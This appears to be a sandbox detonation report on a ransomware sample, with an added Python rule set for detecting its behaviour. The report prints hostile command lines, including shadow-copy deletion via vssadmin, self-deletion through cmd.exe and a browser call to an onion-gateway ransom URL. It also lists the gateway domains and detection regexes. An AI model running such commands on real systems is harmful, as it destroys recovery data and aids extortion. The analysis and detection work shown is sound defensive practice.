| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | "C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe" |
| C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
| C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\51B4EF~1.EXE >> NUL |
| C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| C:\Users\Admin\AppData\Roaming\qrsjojt.exe | N/A |
| C:\Windows\System32\vssadmin.exe | "C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet |
| C:\Windows\system32\vssvc.exe | N/A |
| C:\Windows\system32\vssvc.exe | N/A |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" http://3kxwjihmkgibht2s.wh47f2as19.com/?enc=1B2RDmn3WiZzFzzVsdLFGReKjkkFRnt467 |
| C:\Program Files\Internet Explorer\iexplore.exe | "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Roaming\log.html |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3060 CREDAT:275457 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:472081 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275469 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:2962450 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:2831374 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:2831389 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:2700307 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:1717289 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:668719 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:3945510 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:603202 /prefetch:2 |
| C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:1586227 /prefetch:2 |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:80 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.wh47f2as19.com | udp |
| US | 8.8.8.8:53 | 7tno4hib47vlep5o.7hwr34n18.com | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.blutmagie.de | udp |
| US | 8.8.8.8:53 | epmhyca5ol6plmx3.tor2web.fi | udp |
| US | 8.8.8.8:53 | 3kxwjihmkgibht2s.wh47f2as19.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
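The Processes list and Network table above carry the command lines and hostnames a detection engineer would key on: vssadmin deleting all shadow copies, cmd.exe deleting the original sample through its 8.3 short name with output sent to NUL, and a browser launched at a URL whose first label is a 16-character base32 string (a v2 onion address) stapled in front of a clearnet gateway domain, the same shape as the tor2web.* and wh47f2as19.com DNS lookups. Two caveats from the signature tables: the NLS\Language key reads fire for IEXPLORE.EXE and cmd.exe as well, so that signature carries no weight on its own, and the SeBackup/SeRestore/SeAudit privileges are vssvc.exe's normal service privileges enabled in response to the vssadmin call; the SeDebugPrivilege enabled by the two sample processes is the interesting token change. The following is an added example of a small rule set evaluated over those rows plus the Wallpaper registry write; it is not the sandbox's rule set, and the IP-lookup service list is an illustrative assumption.

```python
import re

# 16 base32 characters: the label form of a v2 .onion address.
ONION_LABEL = r"[a-z2-7]{16}"
URL_RE = re.compile(r'https?://(' + ONION_LABEL + r')\.([^/\s:"]+)', re.I)
DNS_RE = re.compile(r'^(' + ONION_LABEL + r')\.(.+)$', re.I)
# Illustrative list (assumption): services a sample uses to learn its public IP.
IP_LOOKUP_SERVICES = {"ipinfo.io"}

# Constructed input: rows copied by hand from the Processes list, the Network
# table and the Control Panel registry rows of this report.
EVENTS = [
    {"type": "process", "cmdline": r'"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\51B4EF~1.EXE >> NUL'},
    {"type": "process", "cmdline": r'"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet'},
    {"type": "process", "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://3kxwjihmkgibht2s.wh47f2as19.com/?enc=1B2RDmn3WiZzFzzVsdLFGReKjkkFRnt467'},
    {"type": "process", "cmdline": r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2176 CREDAT:275457 /prefetch:2'},
    {"type": "dns", "domain": "ipinfo.io"},
    {"type": "dns", "domain": "epmhyca5ol6plmx3.wh47f2as19.com"},
    {"type": "dns", "domain": "7tno4hib47vlep5o.7hwr34n18.com"},
    {"type": "dns", "domain": "epmhyca5ol6plmx3.tor2web.blutmagie.de"},
    {"type": "dns", "domain": "epmhyca5ol6plmx3.tor2web.fi"},
    {"type": "dns", "domain": "ieonline.microsoft.com"},
    {"type": "registry", "process": r"C:\Users\Admin\AppData\Roaming\qrsjojt.exe",
     "key": r"\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Control Panel\Desktop\Wallpaper",
     "value": r"C:\Users\Admin\Desktop\HELP_RESTORE_FILES.bmp"},
]


def _onion_match(ev):
    """Match an onion-label host in a command-line URL or a DNS query name."""
    if ev["type"] == "process":
        return URL_RE.search(ev["cmdline"])
    if ev["type"] == "dns":
        return DNS_RE.match(ev["domain"])
    return None


def rule_shadow_delete(ev):
    if ev["type"] == "process" and re.search(r'vssadmin(?:\.exe)?"?\s+delete\s+shadows', ev["cmdline"], re.I):
        return "vssadmin deletes volume shadow copies"


def rule_self_delete(ev):
    # "cmd /c del <file> >> NUL": the sample removes its own dropper.
    if ev["type"] == "process" and re.search(r'cmd(?:\.exe)?"?\s+/c\s+del\b.*>>\s*NUL', ev["cmdline"], re.I):
        return "cmd.exe deletes a file with output discarded"


def rule_onion_gateway(ev):
    m = _onion_match(ev)
    if m:
        return f"onion address {m.group(1).lower()} reached through gateway {m.group(2).lower()}"


def rule_ip_lookup(ev):
    if ev["type"] == "dns" and ev["domain"].lower() in IP_LOOKUP_SERVICES:
        return f"external IP lookup via {ev['domain']}"


def rule_wallpaper_from_appdata(ev):
    # Wallpaper rewritten by a binary living under %AppData%, not by the shell.
    if (ev["type"] == "registry"
            and ev["key"].lower().endswith("\\control panel\\desktop\\wallpaper")
            and "\\appdata\\" in ev["process"].lower()):
        return f"wallpaper set to {ev['value']} by {ev['process']}"


RULES = [rule_shadow_delete, rule_self_delete, rule_onion_gateway,
         rule_ip_lookup, rule_wallpaper_from_appdata]


def evaluate(events, rules=RULES):
    """Return (rule name, message) for every rule that fires on every event."""
    hits = []
    for ev in events:
        for rule in rules:
            msg = rule(ev)
            if msg:
                hits.append((rule.__name__, msg))
    return hits


def onion_hosts(events):
    """Distinct (onion label, gateway domain) pairs seen in URLs or DNS names."""
    found = set()
    for ev in events:
        m = _onion_match(ev)
        if m:
            found.add((m.group(1).lower(), m.group(2).lower()))
    return sorted(found)


if __name__ == "__main__":
    for name, msg in evaluate(EVENTS):
        print(f"{name}: {msg}")
    print(onion_hosts(EVENTS))
```

The gateway domains are the useful network IOCs: the onion label is the same across gateways, so blocking or alerting on the 16-character-label-plus-gateway shape catches the fallback domains too, whereas a single hostname IOC would not.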
Files
memory/2340-0-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-6-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-15-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-16-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2948-13-0x0000000000400000-0x0000000000447000-memory.dmp
memory/2340-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2340-8-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-4-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-12-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2340-3-0x0000000000400000-0x0000000000472000-memory.dmp
\Users\Admin\AppData\Roaming\qrsjojt.exe
| MD5 | 6e080aa085293bb9fbdcc9015337d309 |
| SHA1 | 51b4ef5dc9d26b7a26e214cee90598631e2eaa67 |
| SHA256 | 9b462800f1bef019d7ec00098682d3ea7fc60e6721555f616399228e4e3ad122 |
| SHA512 | 4e173fb5287c7ea8ff116099ec1a0599b37f743f8b798368319b5960af38e742124223dfd209457665b701e9efc6e76071fa2513322b232ac50ddad21fcebe77 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win11-20241007-en
Max time kernel
91s
Max time network
94s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
| PID 5008 wrote to memory of 2824 | N/A | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe | C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
"C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe"
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
C:\Users\Admin\AppData\Local\Temp\51B4EF5DC9D26B7A26E214CEE90598631E2EAA67.exe
Network
Files
memory/5008-0-0x0000000000400000-0x0000000000447000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-14 05:42
Reported
2024-11-14 05:44
Platform
win7-20240903-en
Max time kernel
111s
Max time network
96s
Command Line
Signatures
Deletes shadow copies
Renames multiple (359) files with added filename extension
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\msconfig = "C:\\Users\\Admin\\AppData\\Roaming\\vtpvaio.exe" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\HELP_RESTORE_FILES.bmp" | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1732 set thread context of 2540 | N/A | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe |
| PID 2332 set thread context of 2492 | N/A | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | C:\Users\Admin\AppData\Roaming\vtpvaio.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\on_desktop\slideshow_glass_frame.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_cloudy.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_few-showers.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\DVD Maker\ja-JP\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\META-INF\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\diner.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\main_background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Title_content-background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\management\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Microsoft Games\SpiderSolitaire\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\kaa.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-background.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\bn.pak | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Internet Explorer\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\it-IT\css\cpu.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_foggy.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\settings.js | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationLeft_ButtonGraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\ro.pak | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_snow.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskmenu\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\Microsoft Shared\VSTO\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\203x8subpicture.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\es-ES\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jre7\lib\zi\Asia\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\plugins\mux\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_right_hover.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_s.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\hu\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\wa\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\calendar.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\css\localizedSettings.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\VideoLAN\VLC\locale\am_ET\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\css\slideShow.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\settings.css | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_Buttongraphic.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bg-dock.png | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| File created | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\it-IT\js\HELP_RESTORE_FILES.txt | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\E906FA3D51E86A61741B3499145A114E9BFB7C56.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\vtpvaio.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
